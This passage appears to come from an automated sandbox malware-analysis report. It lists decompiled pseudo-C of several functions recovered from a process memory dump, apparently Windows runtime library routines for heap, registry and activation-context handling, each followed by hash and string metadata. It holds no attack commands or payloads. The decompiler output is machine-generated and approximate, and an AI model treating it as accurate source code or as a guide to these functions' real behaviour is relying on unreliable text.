                        					}
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: RTL: Re-Waiting
                        • API String ID: 0-316354757
                        • Opcode ID: 1d2964b354897bf4cfda3a5a3be4e0af134c302c5dfdf08fb6173f5defed3e3f
                        • Instruction ID: d6f45bf05e0eb7056aa12c9ad05d8eeb88e2ecad487c994f91ada2f62c3c50c3
                        • Opcode Fuzzy Hash: 1d2964b354897bf4cfda3a5a3be4e0af134c302c5dfdf08fb6173f5defed3e3f
                        • Instruction Fuzzy Hash: 5D611471E00A44ABDF21DF68C880B7EB7B9EF44714F1446EAD8629B6D0DB749940CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E02C60EA5(void* __ecx, void* __edx) {
                        				signed int _v20;
                        				char _v24;
                        				intOrPtr _v28;
                        				unsigned int _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				char _v44;
                        				intOrPtr _v64;
                        				void* __ebx;
                        				void* __edi;
                        				signed int _t58;
                        				unsigned int _t60;
                        				intOrPtr _t62;
                        				char* _t67;
                        				char* _t69;
                        				void* _t80;
                        				void* _t83;
                        				intOrPtr _t93;
                        				intOrPtr _t115;
                        				char _t117;
                        				void* _t120;
                        
                        				_t83 = __edx;
                        				_t117 = 0;
                        				_t120 = __ecx;
                        				_v44 = 0;
                        				if(E02C5FF69(__ecx,  &_v44,  &_v32) < 0) {
                        					L24:
                        					_t109 = _v44;
                        					if(_v44 != 0) {
                        						E02C61074(_t83, _t120, _t109, _t117, _t117);
                        					}
                        					L26:
                        					return _t117;
                        				}
                        				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                        				_t5 = _t83 + 1; // 0x1
                        				_v36 = _t5 << 0xc;
                        				_v40 = _t93;
                        				_t58 =  *(_t93 + 0xc) & 0x40000000;
                        				asm("sbb ebx, ebx");
                        				_t83 = ( ~_t58 & 0x0000003c) + 4;
                        				if(_t58 != 0) {
                        					_push(0);
                        					_push(0x14);
                        					_push( &_v24);
                        					_push(3);
                        					_push(_t93);
                        					_push(0xffffffff);
                        					_t80 = E02BD9730();
                        					_t115 = _v64;
                        					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                        						_push(_t93);
                        						E02C5A80D(_t115, 1, _v20, _t117);
                        						_t83 = 4;
                        					}
                        				}
                        				if(E02C5A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                        					goto L24;
                        				}
                        				_t60 = _v32;
                        				_t97 = (_t60 != 0x100000) + 1;
                        				_t83 = (_v44 -  *0x2c88b04 >> 0x14) + (_v44 -  *0x2c88b04 >> 0x14);
                        				_v28 = (_t60 != 0x100000) + 1;
                        				_t62 = _t83 + (_t60 >> 0x14) * 2;
                        				_v40 = _t62;
                        				if(_t83 >= _t62) {
                        					L10:
                        					asm("lock xadd [eax], ecx");
                        					asm("lock xadd [eax], ecx");
                        					if(E02BB7D50() == 0) {
                        						_t67 = 0x7ffe0380;
                        					} else {
                        						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						E02C5138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                        					}
                        					if(E02BB7D50() == 0) {
                        						_t69 = 0x7ffe0388;
                        					} else {
                        						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        					}
                        					if( *_t69 != 0) {
                        						E02C4FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                        					}
                        					if(( *0x2c88724 & 0x00000008) != 0) {
                        						E02C552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                        					}
                        					_t117 = _v44;
                        					goto L26;
                        				}
                        				while(E02C615B5(0x2c88ae4, _t83, _t97, _t97) >= 0) {
                        					_t97 = _v28;
                        					_t83 = _t83 + 2;
                        					if(_t83 < _v40) {
                        						continue;
                        					}
                        					goto L10;
                        				}
                        				goto L24;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: e0d9012e536316703ed30e69ce48ad15225a94522b553dcbc6df85d1690f3d04
                        • Instruction ID: caa3bc52a756f1689c142d7387efa03875b3b669c4c2f2bdb0b1a247a8402c76
                        • Opcode Fuzzy Hash: e0d9012e536316703ed30e69ce48ad15225a94522b553dcbc6df85d1690f3d04
                        • Instruction Fuzzy Hash: 5951AF712043819FD714DF19D9C8B2BB7E6EBC4304F084A2CF946A7290D771E946CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E02BCF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				char* _v20;
                        				intOrPtr _v24;
                        				char _v28;
                        				intOrPtr _v32;
                        				char _v36;
                        				char _v44;
                        				char _v52;
                        				intOrPtr _v56;
                        				char _v60;
                        				intOrPtr _v72;
                        				void* _t51;
                        				void* _t58;
                        				signed short _t82;
                        				short _t84;
                        				signed int _t91;
                        				signed int _t100;
                        				signed short* _t103;
                        				void* _t108;
                        				intOrPtr* _t109;
                        
                        				_t103 = __ecx;
                        				_t82 = __edx;
                        				_t51 = E02BB4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                        				if(_t51 >= 0) {
                        					_push(0x21);
                        					_push(3);
                        					_v56 =  *0x7ffe02dc;
                        					_v20 =  &_v52;
                        					_push( &_v44);
                        					_v28 = 0x18;
                        					_push( &_v28);
                        					_push(0x100020);
                        					_v24 = 0;
                        					_push( &_v60);
                        					_v16 = 0x40;
                        					_v12 = 0;
                        					_v8 = 0;
                        					_t58 = E02BD9830();
                        					_t87 =  *[fs:0x30];
                        					_t108 = _t58;
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                        					if(_t108 < 0) {
                        						L11:
                        						_t51 = _t108;
                        					} else {
                        						_push(4);
                        						_push(8);
                        						_push( &_v36);
                        						_push( &_v44);
                        						_push(_v60);
                        						_t108 = E02BD9990();
                        						if(_t108 < 0) {
                        							L10:
                        							_push(_v60);
                        							E02BD95D0();
                        							goto L11;
                        						} else {
                        							_t109 = L02BB4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                        							if(_t109 == 0) {
                        								_t108 = 0xc0000017;
                        								goto L10;
                        							} else {
                        								_t21 = _t109 + 0x18; // 0x18
                        								 *((intOrPtr*)(_t109 + 4)) = _v60;
                        								 *_t109 = 1;
                        								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                        								 *(_t109 + 0xe) = _t82;
                        								 *((intOrPtr*)(_t109 + 8)) = _v56;
                        								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                        								E02BDF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                        								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                        								 *((short*)(_t109 + 0xc)) =  *_t103;
                        								_t91 =  *_t103 & 0x0000ffff;
                        								_t100 = _t91 & 0xfffffffe;
                        								_t84 = 0x5c;
                        								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                        									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                        										_push(_v60);
                        										E02BD95D0();
                        										L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                        										_t51 = 0xc0000106;
                        									} else {
                        										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                        										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                        										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                        										goto L5;
                        									}
                        								} else {
                        									L5:
                        									 *_a4 = _t109;
                        									_t51 = 0;
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t51;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction ID: e8e9bfe74170fa5d1465001db390f6281988314b72ba33e08f851549d6d6bb29
                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction Fuzzy Hash: 9B517C71504710AFC321DF29C840A6BBBF9FF88714F108A6EF99597690E7B4E944CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E02C13540(intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v88;
                        				intOrPtr _v92;
                        				char _v96;
                        				char _v352;
                        				char _v1072;
                        				intOrPtr _v1140;
                        				intOrPtr _v1148;
                        				char _v1152;
                        				char _v1156;
                        				char _v1160;
                        				char _v1164;
                        				char _v1168;
                        				char* _v1172;
                        				short _v1174;
                        				char _v1176;
                        				char _v1180;
                        				char _v1192;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				short _t41;
                        				short _t42;
                        				intOrPtr _t80;
                        				intOrPtr _t81;
                        				signed int _t82;
                        				void* _t83;
                        
                        				_v12 =  *0x2c8d360 ^ _t82;
                        				_t41 = 0x14;
                        				_v1176 = _t41;
                        				_t42 = 0x16;
                        				_v1174 = _t42;
                        				_v1164 = 0x100;
                        				_v1172 = L"BinaryHash";
                        				_t81 = E02BD0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                        				if(_t81 < 0) {
                        					L11:
                        					_t75 = _t81;
                        					E02C13706(0, _t81, _t79, _t80);
                        					L12:
                        					if(_a4 != 0xc000047f) {
                        						E02BDFA60( &_v1152, 0, 0x50);
                        						_v1152 = 0x60c201e;
                        						_v1148 = 1;
                        						_v1140 = E02C13540;
                        						E02BDFA60( &_v1072, 0, 0x2cc);
                        						_push( &_v1072);
                        						E02BEDDD0( &_v1072, _t75, _t79, _t80, _t81);
                        						E02C20C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                        						_push(_v1152);
                        						_push(0xffffffff);
                        						E02BD97C0();
                        					}
                        					return E02BDB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                        				}
                        				_t79 =  &_v352;
                        				_t81 = E02C13971(0, _a4,  &_v352,  &_v1156);
                        				if(_t81 < 0) {
                        					goto L11;
                        				}
                        				_t75 = _v1156;
                        				_t79 =  &_v1160;
                        				_t81 = E02C13884(_v1156,  &_v1160,  &_v1168);
                        				if(_t81 >= 0) {
                        					_t80 = _v1160;
                        					E02BDFA60( &_v96, 0, 0x50);
                        					_t83 = _t83 + 0xc;
                        					_push( &_v1180);
                        					_push(0x50);
                        					_push( &_v96);
                        					_push(2);
                        					_push( &_v1176);
                        					_push(_v1156);
                        					_t81 = E02BD9650();
                        					if(_t81 >= 0) {
                        						if(_v92 != 3 || _v88 == 0) {
                        							_t81 = 0xc000090b;
                        						}
                        						if(_t81 >= 0) {
                        							_t75 = _a4;
                        							_t79 =  &_v352;
                        							E02C13787(_a4,  &_v352, _t80);
                        						}
                        					}
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                        				}
                        				_push(_v1156);
                        				E02BD95D0();
                        				if(_t81 >= 0) {
                        					goto L12;
                        				} else {
                        					goto L11;
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: BinaryHash
                        • API String ID: 0-2202222882
                        • Opcode ID: cdd07ece66bd58b221428c5cb621bf4f3ee21c029bac725dafe9e54bf8b899e1
                        • Instruction ID: 082c5fec602d815b42dfe19fefc66329f271bf30c40d40604bd216d764e60ac1
                        • Opcode Fuzzy Hash: cdd07ece66bd58b221428c5cb621bf4f3ee21c029bac725dafe9e54bf8b899e1
                        • Instruction Fuzzy Hash: C34164F2D0056C9BDB21DA50CC85FEEB77DAB45718F0045E5EA09AB240EB309E89DF94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E02C605AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                        				signed int _v20;
                        				char _v24;
                        				signed int _v28;
                        				char _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				void* __ebx;
                        				void* _t35;
                        				signed int _t42;
                        				char* _t48;
                        				signed int _t59;
                        				signed char _t61;
                        				signed int* _t79;
                        				void* _t88;
                        
                        				_v28 = __edx;
                        				_t79 = __ecx;
                        				if(E02C607DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                        					L13:
                        					_t35 = 0;
                        					L14:
                        					return _t35;
                        				}
                        				_t61 = __ecx[1];
                        				_t59 = __ecx[0xf];
                        				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                        				_v36 = _a8 << 0xc;
                        				_t42 =  *(_t59 + 0xc) & 0x40000000;
                        				asm("sbb esi, esi");
                        				_t88 = ( ~_t42 & 0x0000003c) + 4;
                        				if(_t42 != 0) {
                        					_push(0);
                        					_push(0x14);
                        					_push( &_v24);
                        					_push(3);
                        					_push(_t59);
                        					_push(0xffffffff);
                        					if(E02BD9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                        						_push(_t61);
                        						E02C5A80D(_t59, 1, _v20, 0);
                        						_t88 = 4;
                        					}
                        				}
                        				_t35 = E02C5A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                        				if(_t35 < 0) {
                        					goto L14;
                        				}
                        				E02C61293(_t79, _v40, E02C607DF(_t79, _v28,  &_a4,  &_a8, 1));
                        				if(E02BB7D50() == 0) {
                        					_t48 = 0x7ffe0380;
                        				} else {
                        					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        					E02C5138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                        				}
                        				goto L13;
                        			}


















                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction ID: d0ca278da43354fa9e07292b9ff5c806c898dc4405aba50fdd9d1ba07f30eca8
                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction Fuzzy Hash: DB31F3322003556BE710DE25CD89FAB77D9BBC4758F044229FE58AB2C0D770EA04CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E02C13884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr* _v16;
                        				char* _v20;
                        				short _v22;
                        				char _v24;
                        				intOrPtr _t38;
                        				short _t40;
                        				short _t41;
                        				void* _t44;
                        				intOrPtr _t47;
                        				void* _t48;
                        
                        				_v16 = __edx;
                        				_t40 = 0x14;
                        				_v24 = _t40;
                        				_t41 = 0x16;
                        				_v22 = _t41;
                        				_t38 = 0;
                        				_v12 = __ecx;
                        				_push( &_v8);
                        				_push(0);
                        				_push(0);
                        				_push(2);
                        				_t43 =  &_v24;
                        				_v20 = L"BinaryName";
                        				_push( &_v24);
                        				_push(__ecx);
                        				_t47 = 0;
                        				_t48 = E02BD9650();
                        				if(_t48 >= 0) {
                        					_t48 = 0xc000090b;
                        				}
                        				if(_t48 != 0xc0000023) {
                        					_t44 = 0;
                        					L13:
                        					if(_t48 < 0) {
                        						L16:
                        						if(_t47 != 0) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                        						}
                        						L18:
                        						return _t48;
                        					}
                        					 *_v16 = _t38;
                        					 *_a4 = _t47;
                        					goto L18;
                        				}
                        				_t47 = L02BB4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                        				if(_t47 != 0) {
                        					_push( &_v8);
                        					_push(_v8);
                        					_push(_t47);
                        					_push(2);
                        					_push( &_v24);
                        					_push(_v12);
                        					_t48 = E02BD9650();
                        					if(_t48 < 0) {
                        						_t44 = 0;
                        						goto L16;
                        					}
                        					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                        						_t48 = 0xc000090b;
                        					}
                        					_t44 = 0;
                        					if(_t48 < 0) {
                        						goto L16;
                        					} else {
                        						_t17 = _t47 + 0xc; // 0xc
                        						_t38 = _t17;
                        						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                        							_t48 = 0xc000090b;
                        						}
                        						goto L13;
                        					}
                        				}
                        				_t48 = _t48 + 0xfffffff4;
                        				goto L18;
                        			}
















                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: BinaryName
                        • API String ID: 0-215506332
                        • Opcode ID: 057935cd374518e6a852a5230cb78b93925ac1756765f597ea809147fa130146
                        • Instruction ID: b5aad01fce291e5caeebe4f7f7ed676ae014de8d2664a534915092b2f06238a4
                        • Opcode Fuzzy Hash: 057935cd374518e6a852a5230cb78b93925ac1756765f597ea809147fa130146
                        • Instruction Fuzzy Hash: 0D31F172900589AFEB15DA59C946EBBB774EF82B28F0141E9ED14A7240D7309E01DBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 33%
                        			E02BCD294(void* __ecx, char __edx, void* __eflags) {
                        				signed int _v8;
                        				char _v52;
                        				signed int _v56;
                        				signed int _v60;
                        				intOrPtr _v64;
                        				char* _v68;
                        				intOrPtr _v72;
                        				char _v76;
                        				signed int _v84;
                        				intOrPtr _v88;
                        				char _v92;
                        				intOrPtr _v96;
                        				intOrPtr _v100;
                        				char _v104;
                        				char _v105;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t35;
                        				char _t38;
                        				signed int _t40;
                        				signed int _t44;
                        				signed int _t52;
                        				void* _t53;
                        				void* _t55;
                        				void* _t61;
                        				intOrPtr _t62;
                        				void* _t64;
                        				signed int _t65;
                        				signed int _t66;
                        
                        				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                        				_v8 =  *0x2c8d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                        				_v105 = __edx;
                        				_push( &_v92);
                        				_t52 = 0;
                        				_push(0);
                        				_push(0);
                        				_push( &_v104);
                        				_push(0);
                        				_t59 = __ecx;
                        				_t55 = 2;
                        				if(E02BB4120(_t55, __ecx) < 0) {
                        					_t35 = 0;
                        					L8:
                        					_pop(_t61);
                        					_pop(_t64);
                        					_pop(_t53);
                        					return E02BDB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                        				}
                        				_v96 = _v100;
                        				_t38 = _v92;
                        				if(_t38 != 0) {
                        					_v104 = _t38;
                        					_v100 = _v88;
                        					_t40 = _v84;
                        				} else {
                        					_t40 = 0;
                        				}
                        				_v72 = _t40;
                        				_v68 =  &_v104;
                        				_push( &_v52);
                        				_v76 = 0x18;
                        				_push( &_v76);
                        				_v64 = 0x40;
                        				_v60 = _t52;
                        				_v56 = _t52;
                        				_t44 = E02BD98D0();
                        				_t62 = _v88;
                        				_t65 = _t44;
                        				if(_t62 != 0) {
                        					asm("lock xadd [edi], eax");
                        					if((_t44 | 0xffffffff) != 0) {
                        						goto L4;
                        					}
                        					_push( *((intOrPtr*)(_t62 + 4)));
                        					E02BD95D0();
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                        					goto L4;
                        				} else {
                        					L4:
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                        					if(_t65 >= 0) {
                        						_t52 = 1;
                        					} else {
                        						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                        							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                        						}
                        					}
                        					_t35 = _t52;
                        					goto L8;
                        				}
                        			}


































                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 423e0aafaa884fccfad363e5aa6117873673e373e26eca28ac6cb9b8ffedc78b
                        • Instruction ID: 8b1244ce463b622cd68759db2a4dbbf2f89c2a3ee431cb7e104f218e58bc64a5
                        • Opcode Fuzzy Hash: 423e0aafaa884fccfad363e5aa6117873673e373e26eca28ac6cb9b8ffedc78b
                        • Instruction Fuzzy Hash: 343190B65087469FC711DF28C980AABBBE8EBC5754F1049AEF99483250E734DD04CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E02BA1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                        				intOrPtr _v8;
                        				char _v16;
                        				intOrPtr* _t26;
                        				intOrPtr _t29;
                        				void* _t30;
                        				signed int _t31;
                        
                        				_t27 = __ecx;
                        				_t29 = __edx;
                        				_t31 = 0;
                        				_v8 = __edx;
                        				if(__edx == 0) {
                        					L18:
                        					_t30 = 0xc000000d;
                        					goto L12;
                        				} else {
                        					_t26 = _a4;
                        					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                        						goto L18;
                        					} else {
                        						E02BDBB40(__ecx,  &_v16, __ecx);
                        						_push(_t26);
                        						_push(0);
                        						_push(0);
                        						_push(_t29);
                        						_push( &_v16);
                        						_t30 = E02BDA9B0();
                        						if(_t30 >= 0) {
                        							_t19 =  *_t26;
                        							if( *_t26 != 0) {
                        								goto L7;
                        							} else {
                        								 *_a8 =  *_a8 & 0;
                        							}
                        						} else {
                        							if(_t30 != 0xc0000023) {
                        								L9:
                        								_push(_t26);
                        								_push( *_t26);
                        								_push(_t31);
                        								_push(_v8);
                        								_push( &_v16);
                        								_t30 = E02BDA9B0();
                        								if(_t30 < 0) {
                        									L12:
                        									if(_t31 != 0) {
                        										L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                        									}
                        								} else {
                        									 *_a8 = _t31;
                        								}
                        							} else {
                        								_t19 =  *_t26;
                        								if( *_t26 == 0) {
                        									_t31 = 0;
                        								} else {
                        									L7:
                        									_t31 = L02BB4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                        								}
                        								if(_t31 == 0) {
                        									_t30 = 0xc0000017;
                        								} else {
                        									goto L9;
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t30;
                        			}










                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: WindowsExcludedProcs
                        • API String ID: 0-3583428290
                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction ID: 23c3afc3a48822c2cc9d3bc8f1b0b32db0368a153c511e3bc306b6f2b2ae343b
                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction Fuzzy Hash: 6F21C876515128ABCB619A5DC850FABB76DEF41654F0544E5FE089F200EB34DD04EBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BBF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                        				intOrPtr _t13;
                        				intOrPtr _t14;
                        				signed int _t16;
                        				signed char _t17;
                        				intOrPtr _t19;
                        				intOrPtr _t21;
                        				intOrPtr _t23;
                        				intOrPtr* _t25;
                        
                        				_t25 = _a8;
                        				_t17 = __ecx;
                        				if(_t25 == 0) {
                        					_t19 = 0xc00000f2;
                        					L8:
                        					return _t19;
                        				}
                        				if((__ecx & 0xfffffffe) != 0) {
                        					_t19 = 0xc00000ef;
                        					goto L8;
                        				}
                        				_t19 = 0;
                        				 *_t25 = 0;
                        				_t21 = 0;
                        				_t23 = "Actx ";
                        				if(__edx != 0) {
                        					if(__edx == 0xfffffffc) {
                        						L21:
                        						_t21 = 0x200;
                        						L5:
                        						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                        						 *_t25 = _t13;
                        						L6:
                        						if(_t13 == 0) {
                        							if((_t17 & 0x00000001) != 0) {
                        								 *_t25 = _t23;
                        							}
                        						}
                        						L7:
                        						goto L8;
                        					}
                        					if(__edx == 0xfffffffd) {
                        						 *_t25 = _t23;
                        						_t13 = _t23;
                        						goto L6;
                        					}
                        					_t13 =  *((intOrPtr*)(__edx + 0x10));
                        					 *_t25 = _t13;
                        					L14:
                        					if(_t21 == 0) {
                        						goto L6;
                        					}
                        					goto L5;
                        				}
                        				_t14 = _a4;
                        				if(_t14 != 0) {
                        					_t16 =  *(_t14 + 0x14) & 0x00000007;
                        					if(_t16 <= 1) {
                        						_t21 = 0x1f8;
                        						_t13 = 0;
                        						goto L14;
                        					}
                        					if(_t16 == 2) {
                        						goto L21;
                        					}
                        					if(_t16 != 4) {
                        						_t19 = 0xc00000f0;
                        						goto L7;
                        					}
                        					_t13 = 0;
                        					goto L6;
                        				} else {
                        					_t21 = 0x1f8;
                        					goto L5;
                        				}
                        			}












                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: Actx
                        • API String ID: 0-89312691
                        • Opcode ID: db5f08e3ee5b84ca24c560f066b4f738c0b7a93876aba0e29ef88c7e519e1995
                        • Instruction ID: 88809c0beb19a438d8bc6cf3eb5de13b551c405bdd29f4ce6e4823a2fd304763
                        • Opcode Fuzzy Hash: db5f08e3ee5b84ca24c560f066b4f738c0b7a93876aba0e29ef88c7e519e1995
                        • Instruction Fuzzy Hash: 6F118E353046029BEB2A4E1FCC907B67295EF96668F2445EAF861CBF91DBF0D840C380
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E02C48DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t35;
                        				void* _t41;
                        
                        				_t40 = __esi;
                        				_t39 = __edi;
                        				_t38 = __edx;
                        				_t35 = __ecx;
                        				_t34 = __ebx;
                        				_push(0x74);
                        				_push(0x2c70d50);
                        				E02BED0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                        				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                        					E02C25720(0x65, 0, "Critical error detected %lx\n", _t35);
